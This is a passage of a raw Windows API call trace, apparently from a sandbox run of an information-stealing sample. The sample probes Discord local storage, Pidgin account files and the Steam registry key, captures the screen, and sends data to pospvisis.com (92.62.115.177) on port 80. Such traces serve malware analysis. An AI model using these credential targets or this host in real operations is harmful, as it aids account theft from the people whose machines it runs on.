Size=0x20) returned 0x2ecf68 [0221.509] GetProcessHeap () returned 0x2b0000 [0221.509] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1f) returned 0x2ecb08 [0221.510] GetProcessHeap () returned 0x2b0000 [0221.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f08f0 [0221.510] GetProcessHeap () returned 0x2b0000 [0221.510] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08f0, Size=0xc) returned 0x2f52e0 [0221.510] GetProcessHeap () returned 0x2b0000 [0221.510] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x18) returned 0x2ceff0 [0221.510] SetLastError (dwErrCode=0x0) [0221.510] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x27e3d0, nSize=0x200 | out: lpBuffer="") returned 0x22 [0221.510] GetProcessHeap () returned 0x2b0000 [0221.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc5a8 [0221.510] GetProcessHeap () returned 0x2b0000 [0221.510] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.510] GetProcessHeap () returned 0x2b0000 [0221.510] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4e8 [0221.511] GetProcessHeap () returned 0x2b0000 [0221.511] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x44) returned 0x2c6680 [0221.511] GetProcessHeap () returned 0x2b0000 [0221.511] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecb08 | out: hHeap=0x2b0000) returned 1 [0221.511] GetProcessHeap () returned 0x2b0000 [0221.511] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc5a8 | out: hHeap=0x2b0000) returned 1 [0221.511] GetProcessHeap () returned 0x2b0000 [0221.511] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.511] GetProcessHeap () returned 0x2b0000 [0221.511] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed080 | out: hHeap=0x2b0000) returned 1 [0221.511] GetProcessHeap () returned 0x2b0000 [0221.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2ed080 [0221.511] GetProcessHeap () returned 0x2b0000 [0221.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x38) returned 0x2eb4a8 [0221.511] GetProcessHeap () returned 0x2b0000 [0221.511] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1e) returned 0x2ecf68 [0221.512] GetProcessHeap () returned 0x2b0000 [0221.512] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x3c) returned 0x2c79e0 [0221.512] GetProcessHeap () returned 0x2b0000 [0221.512] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c79e0, Size=0x78) returned 0x2c0fa0 [0221.512] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Discord\\Local Storage" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\discord\\local storage"), dwDesiredAccess=0x0, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2200000, hTemplateFile=0x0) returned 0xffffffff [0221.512] GetLastError () returned 0x3 [0221.512] GetProcessHeap () returned 0x2b0000 [0221.512] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c0fa0 | out: hHeap=0x2b0000) returned 1 [0221.512] GetProcessHeap () returned 0x2b0000 [0221.512] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x38) returned 0x2eb3e8 [0221.512] GetProcessHeap () returned 0x2b0000 [0221.512] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0221.512] GetProcessHeap () returned 0x2b0000 [0221.512] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb3e8 | out: hHeap=0x2b0000) returned 1 [0221.514] GetProcessHeap () returned 0x2b0000 [0221.514] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c6680 | out: hHeap=0x2b0000) returned 1 [0221.514] GetProcessHeap () returned 0x2b0000 [0221.514] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08e0 | out: hHeap=0x2b0000) returned 1 [0221.514] GetProcessHeap () returned 0x2b0000 [0221.514] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed080 | out: hHeap=0x2b0000) returned 1 [0221.515] GetProcessHeap () returned 0x2b0000 [0221.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1e) returned 0x2ed080 [0221.515] GetProcessHeap () returned 0x2b0000 [0221.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2ecf68 [0221.515] GetProcessHeap () returned 0x2b0000 [0221.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1e) returned 0x2ecb08 [0221.515] GetProcessHeap () returned 0x2b0000 [0221.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x6) returned 0x2f08e0 [0221.515] GetProcessHeap () returned 0x2b0000 [0221.515] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0xc) returned 0x2f52e0 [0221.515] GetProcessHeap () returned 0x2b0000 [0221.515] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x18) returned 0x2ceff0 [0221.515] SetLastError (dwErrCode=0x0) [0221.515] GetEnvironmentVariableW (in: lpName="appdata", lpBuffer=0x27e3f0, nSize=0x200 | out: lpBuffer="") returned 0x22 [0221.515] GetProcessHeap () returned 0x2b0000 [0221.515] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc5a8 [0221.516] GetProcessHeap () returned 0x2b0000 [0221.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.516] GetProcessHeap () returned 0x2b0000 [0221.516] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc4e8 [0221.516] GetProcessHeap () returned 0x2b0000 [0221.516] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc4e8, Size=0x44) returned 0x2c6680 [0221.516] GetProcessHeap () returned 0x2b0000 [0221.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecb08 | out: hHeap=0x2b0000) returned 1 [0221.516] GetProcessHeap () returned 0x2b0000 [0221.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc5a8 | out: hHeap=0x2b0000) returned 1 [0221.516] GetProcessHeap () returned 0x2b0000 [0221.516] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.517] GetProcessHeap () returned 0x2b0000 [0221.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1e) returned 0x2ecf68 [0221.517] GetProcessHeap () returned 0x2b0000 [0221.517] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x3c) returned 0x2c79e0 [0221.517] GetProcessHeap () returned 0x2b0000 [0221.517] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c79e0, Size=0x78) returned 0x2c0fa0 [0221.517] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\.purple\\accounts.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\.purple\\accounts.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0221.517] GetLastError () returned 0x3 [0221.517] GetProcessHeap () returned 0x2b0000 [0221.517] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c0fa0 | out: hHeap=0x2b0000) returned 1 [0221.517] GetProcessHeap () returned 0x2b0000 [0221.517] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c6680 | out: hHeap=0x2b0000) returned 1 [0221.517] GetProcessHeap () returned 0x2b0000 [0221.517] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed080 | out: hHeap=0x2b0000) returned 1 [0221.517] GetProcessHeap () returned 0x2b0000 [0221.517] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2ceff0 [0221.517] GetProcessHeap () returned 0x2b0000 [0221.517] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ceff0, Size=0x24) returned 0x2dc5a8 [0221.517] GetProcessHeap () returned 0x2b0000 [0221.517] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc5a8, Size=0x48) returned 0x2c6680 [0221.517] GetProcessHeap () returned 0x2b0000 [0221.517] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x42) returned 0x2c6590 [0221.517] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\WOW6432Node\\Valve\\Steam", ulOptions=0x0, samDesired=0x101, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x0) returned 0x2 [0221.518] GetProcessHeap () returned 0x2b0000 [0221.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c6590 | out: hHeap=0x2b0000) returned 1 [0221.518] GetProcessHeap () returned 0x2b0000 [0221.518] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c6630 | out: hHeap=0x2b0000) returned 1 [0221.518] GetProcessHeap () returned 0x2b0000 [0221.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0221.518] GetProcessHeap () returned 0x2b0000 [0221.518] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08f0 [0221.518] GetProcessHeap () returned 0x2b0000 [0221.518] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08f0, Size=0x10) returned 0x2f52e0 [0221.518] send (s=0x300, buf=0x2f52e0*, len=4, flags=0) returned 4 [0221.519] send (s=0x300, buf=0x2f52e4*, len=5, flags=0) returned 5 [0221.519] GetProcessHeap () returned 0x2b0000 [0221.519] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.519] GetProcessHeap () returned 0x2b0000 [0221.519] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08e0 | out: hHeap=0x2b0000) returned 1 [0221.519] GetProcessHeap () returned 0x2b0000 [0221.519] GetSystemMetrics (nIndex=76) returned 0 [0221.519] GetSystemMetrics (nIndex=77) returned 0 [0221.519] GetDC (hWnd=0x0) returned 0xffffffffbc0107a8 [0221.519] GetCurrentObject (hdc=0xbc0107a8, type=0x7) returned 0x1050032 [0221.519] GetObjectW (in: h=0x1050032, c=24, pv=0x27ecc0 | out: pv=0x27ecc0) returned 0 [0221.519] DeleteObject (ho=0x1050032) returned 1 [0221.519] CreateCompatibleDC (hdc=0xbc0107a8) returned 0x18010bd4 [0221.519] CreateDIBSection (in: hdc=0xbc0107a8, lpbmi=0x27f2e0, usage=0x0, ppvBits=0x27e8a0, hSection=0x0, offset=0x0 | out: ppvBits=0x27e8a0) returned 0x0 [0221.520] SelectObject (hdc=0x18010bd4, h=0x0) returned 0x0 [0221.520] BitBlt (hdc=0x18010bd4, x=0, y=0, cx=0, cy=0, hdcSrc=0xbc0107a8, x1=0, y1=0, rop=0xcc0020) returned 1 [0221.520] GetProcessHeap () returned 0x2b0000 [0221.520] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe) returned 0x2f52e0 [0221.520] GetProcessHeap () returned 0x2b0000 [0221.520] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x28) returned 0x2dc5a8 [0221.520] GetProcessHeap () returned 0x2b0000 [0221.520] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x36) returned 0x2eb3e8 [0221.520] GetProcessHeap () returned 0x2b0000 [0221.520] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc5a8 | out: hHeap=0x2b0000) returned 1 [0221.521] GetProcessHeap () returned 0x2b0000 [0221.521] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0221.521] GetProcessHeap () returned 0x2b0000 [0221.521] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0x10) returned 0x2f52e0 [0221.521] GetProcessHeap () returned 0x2b0000 [0221.521] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ed080 [0221.521] GetProcessHeap () returned 0x2b0000 [0221.521] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ed080, Size=0x40) returned 0x2c79e0 [0221.522] GetProcessHeap () returned 0x2b0000 [0221.522] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0221.522] GetProcessHeap () returned 0x2b0000 [0221.522] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0x3f) returned 0x2c7ab8 [0221.522] send (s=0x300, buf=0x2c7ab8*, len=31, flags=0) returned 31 [0221.522] send (s=0x300, buf=0x2c7ad7*, len=32, flags=0) returned 32 [0221.522] GetProcessHeap () returned 0x2b0000 [0221.522] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c7ab8 | out: hHeap=0x2b0000) returned 1 [0221.522] GetProcessHeap () returned 0x2b0000 [0221.522] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c79e0 | out: hHeap=0x2b0000) returned 1 [0221.522] GetProcessHeap () returned 0x2b0000 [0221.522] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb3e8 | out: hHeap=0x2b0000) returned 1 [0221.522] shutdown (s=0x300, how=2) returned 0 [0221.523] GetProcessHeap () returned 0x2b0000 [0221.523] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0221.523] GetProcessHeap () returned 0x2b0000 [0221.523] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0x7) returned 0x2f08f0 [0221.523] GetProcessHeap () returned 0x2b0000 [0221.523] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0221.526] GetProcessHeap () returned 0x2b0000 [0221.526] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0x10) returned 0x2f52e0 [0221.527] GetProcessHeap () returned 0x2b0000 [0221.527] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08f0 | out: hHeap=0x2b0000) returned 1 [0221.527] GetProcessHeap () returned 0x2b0000 [0221.527] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08f0 [0221.527] GetProcessHeap () returned 0x2b0000 [0221.527] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08f0, Size=0x10) returned 0x2f52b0 [0221.527] send (s=0x300, buf=0x2f52b0*, len=8, flags=0) returned -1 [0221.527] WSAGetLastError () returned 10058 [0221.527] GetProcessHeap () returned 0x2b0000 [0221.527] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52b0 | out: hHeap=0x2b0000) returned 1 [0221.527] GetProcessHeap () returned 0x2b0000 [0221.528] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.528] GetProcessHeap () returned 0x2b0000 [0221.528] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2f52e0 [0221.528] GetProcessHeap () returned 0x2b0000 [0221.528] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe) returned 0x2f52b0 [0221.528] getaddrinfo (in: pNodeName="pospvisis.com", pServiceName=0x0, pHints=0x27e6f0*(ai_flags=0, ai_family=0, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x27e740 | out: ppResult=0x27e740*=0x2ecf68*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2f5340*(sa_family=2, sin_port=0x0, sin_addr="92.62.115.177"), ai_next=0x0)) returned 0 [0221.531] GetProcessHeap () returned 0x2b0000 [0221.531] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52b0 | out: hHeap=0x2b0000) returned 1 [0221.531] GetProcessHeap () returned 0x2b0000 [0221.531] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2ed080 [0221.532] FreeAddrInfoW (pAddrInfo=0x2ecf68*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x2f5340*(sa_family=2, sin_port=0x0, sin_addr="92.62.115.177"), ai_next=0x0)) [0221.532] WSASocketW (af=2, type=1, protocol=0, lpProtocolInfo=0x0, g=0x0, dwFlags=0x81) returned 0x314 [0221.532] connect (s=0x314, name=0x27e6b4*(sa_family=2, sin_port=0x50, sin_addr="92.62.115.177"), namelen=16) returned 0 [0221.640] GetProcessHeap () returned 0x2b0000 [0221.640] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed080 | out: hHeap=0x2b0000) returned 1 [0221.640] GetProcessHeap () returned 0x2b0000 [0221.640] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.641] GetProcessHeap () returned 0x2b0000 [0221.641] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2f52e0 [0221.641] setsockopt (s=0x314, level=6, optname=1, optval="\x01R/", optlen=1) returned 0 [0221.642] ioctlsocket (in: s=0x314, cmd=-2147195266, argp=0x27e6f0 | out: argp=0x27e6f0) returned 0 [0221.642] recv (in: s=0x314, buf=0x27e780, len=2, flags=0 | out: buf=0x27e780*) returned 2 [0221.747] GetProcessHeap () returned 0x2b0000 [0221.747] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x27) returned 0x2dc5a8 [0221.747] recv (in: s=0x314, buf=0x2dc5a8, len=39, flags=0 | out: buf=0x2dc5a8*) returned 39 [0221.748] GetProcessHeap () returned 0x2b0000 [0221.748] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x15) returned 0x2cefd0 [0221.749] GetProcessHeap () returned 0x2b0000 [0221.749] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x2f5340 [0221.749] GetProcessHeap () returned 0x2b0000 [0221.749] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5340 | out: hHeap=0x2b0000) returned 1 [0221.749] GetProcessHeap () returned 0x2b0000 [0221.749] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x5) returned 0x2f08f0 [0221.750] GetProcessHeap () returned 0x2b0000 [0221.750] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x2f5340 [0221.750] GetProcessHeap () returned 0x2b0000 [0221.750] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5340 | out: hHeap=0x2b0000) returned 1 [0221.750] GetProcessHeap () returned 0x2b0000 [0221.750] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1) returned 0x2f08e0 [0221.750] GetProcessHeap () returned 0x2b0000 [0221.750] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08e0 | out: hHeap=0x2b0000) returned 1 [0221.750] GetProcessHeap () returned 0x2b0000 [0221.750] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x20) returned 0x2ed080 [0221.750] GetProcessHeap () returned 0x2b0000 [0221.750] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x15) returned 0x2cf110 [0221.750] GetProcessHeap () returned 0x2b0000 [0221.750] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0221.750] GetProcessHeap () returned 0x2b0000 [0221.750] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0x10) returned 0x2f5340 [0221.750] GetProcessHeap () returned 0x2b0000 [0221.750] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f5340, Size=0x20) returned 0x2ecf68 [0221.750] SetLastError (dwErrCode=0x0) [0221.751] GetEnvironmentVariableW (in: lpName="userprofile", lpBuffer=0x27e260, nSize=0x200 | out: lpBuffer="") returned 0x12 [0221.751] GetProcessHeap () returned 0x2b0000 [0221.751] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2cf130 [0221.753] GetProcessHeap () returned 0x2b0000 [0221.753] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.753] GetProcessHeap () returned 0x2b0000 [0221.753] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2cf150 [0221.754] GetProcessHeap () returned 0x2b0000 [0221.754] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cf150, Size=0x24) returned 0x2dc4e8 [0221.754] GetProcessHeap () returned 0x2b0000 [0221.754] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf110 | out: hHeap=0x2b0000) returned 1 [0221.754] GetProcessHeap () returned 0x2b0000 [0221.754] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cf130 | out: hHeap=0x2b0000) returned 1 [0221.755] GetProcessHeap () returned 0x2b0000 [0221.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed080 | out: hHeap=0x2b0000) returned 1 [0221.755] GetProcessHeap () returned 0x2b0000 [0221.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cefd0 | out: hHeap=0x2b0000) returned 1 [0221.755] GetProcessHeap () returned 0x2b0000 [0221.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2ed080 [0221.755] GetProcessHeap () returned 0x2b0000 [0221.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed080 | out: hHeap=0x2b0000) returned 1 [0221.755] GetProcessHeap () returned 0x2b0000 [0221.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x70) returned 0x2d40d0 [0221.755] GetProcessHeap () returned 0x2b0000 [0221.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x2f5340 [0221.755] GetProcessHeap () returned 0x2b0000 [0221.755] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5340 | out: hHeap=0x2b0000) returned 1 [0221.755] GetProcessHeap () returned 0x2b0000 [0221.755] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x2f5340 [0221.756] send (s=0x314, buf=0x27e6b0*, len=8, flags=0) returned 8 [0221.757] GetProcessHeap () returned 0x2b0000 [0221.757] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2f52b0 [0221.758] GetProcessHeap () returned 0x2b0000 [0221.758] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0221.758] GetProcessHeap () returned 0x2b0000 [0221.758] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0x14) returned 0x2cefd0 [0221.759] GetProcessHeap () returned 0x2b0000 [0221.759] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0221.760] GetProcessHeap () returned 0x2b0000 [0221.760] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0x19) returned 0x2ed080 [0221.768] send (s=0x314, buf=0x2ed080*, len=12, flags=0) returned 12 [0221.769] send (s=0x314, buf=0x2ed08c*, len=13, flags=0) returned 13 [0221.769] GetProcessHeap () returned 0x2b0000 [0221.769] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ed080 | out: hHeap=0x2b0000) returned 1 [0221.770] GetProcessHeap () returned 0x2b0000 [0221.770] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cefd0 | out: hHeap=0x2b0000) returned 1 [0221.770] GetProcessHeap () returned 0x2b0000 [0221.770] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52b0 | out: hHeap=0x2b0000) returned 1 [0221.770] GetProcessHeap () returned 0x2b0000 [0221.770] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5340 | out: hHeap=0x2b0000) returned 1 [0221.770] GetProcessHeap () returned 0x2b0000 [0221.770] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc5a8 | out: hHeap=0x2b0000) returned 1 [0221.770] GetProcessHeap () returned 0x2b0000 [0221.770] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.770] closesocket (s=0x300) returned 0 [0221.771] GetProcessHeap () returned 0x2b0000 [0221.771] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc4e8 | out: hHeap=0x2b0000) returned 1 [0221.771] GetProcessHeap () returned 0x2b0000 [0221.771] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08f0 | out: hHeap=0x2b0000) returned 1 [0221.771] GetProcessHeap () returned 0x2b0000 [0221.771] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d40d0 | out: hHeap=0x2b0000) returned 1 [0221.772] GetProcessHeap () returned 0x2b0000 [0221.772] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08f0 [0221.772] GetProcessHeap () returned 0x2b0000 [0221.772] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08f0, Size=0x7) returned 0x2f08e0 [0221.772] GetProcessHeap () returned 0x2b0000 [0221.772] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08f0 [0221.773] GetProcessHeap () returned 0x2b0000 [0221.773] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08f0, Size=0x10) returned 0x2f52e0 [0221.773] GetProcessHeap () returned 0x2b0000 [0221.773] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08e0 | out: hHeap=0x2b0000) returned 1 [0221.773] GetProcessHeap () returned 0x2b0000 [0221.773] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08e0 [0221.773] GetProcessHeap () returned 0x2b0000 [0221.773] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08e0, Size=0x10) returned 0x2f5340 [0221.773] send (s=0x314, buf=0x2f5340*, len=8, flags=0) returned 8 [0221.774] send (s=0x314, buf=0x2f5348*, len=8, flags=0) returned 8 [0221.774] GetProcessHeap () returned 0x2b0000 [0221.774] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5340 | out: hHeap=0x2b0000) returned 1 [0221.774] recv (in: s=0x314, buf=0x27e860, len=4, flags=0 | out: buf=0x27e860*) returned 4 [0221.877] GetProcessHeap () returned 0x2b0000 [0221.877] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2f08e0 [0221.877] recv (in: s=0x314, buf=0x2f08e0, len=4, flags=0 | out: buf=0x2f08e0*) returned 4 [0221.878] GetProcessHeap () returned 0x2b0000 [0221.878] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x2f5340 [0221.878] GetProcessHeap () returned 0x2b0000 [0221.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f5340 | out: hHeap=0x2b0000) returned 1 [0221.878] GetProcessHeap () returned 0x2b0000 [0221.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f08e0 | out: hHeap=0x2b0000) returned 1 [0221.878] GetProcessHeap () returned 0x2b0000 [0221.878] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, 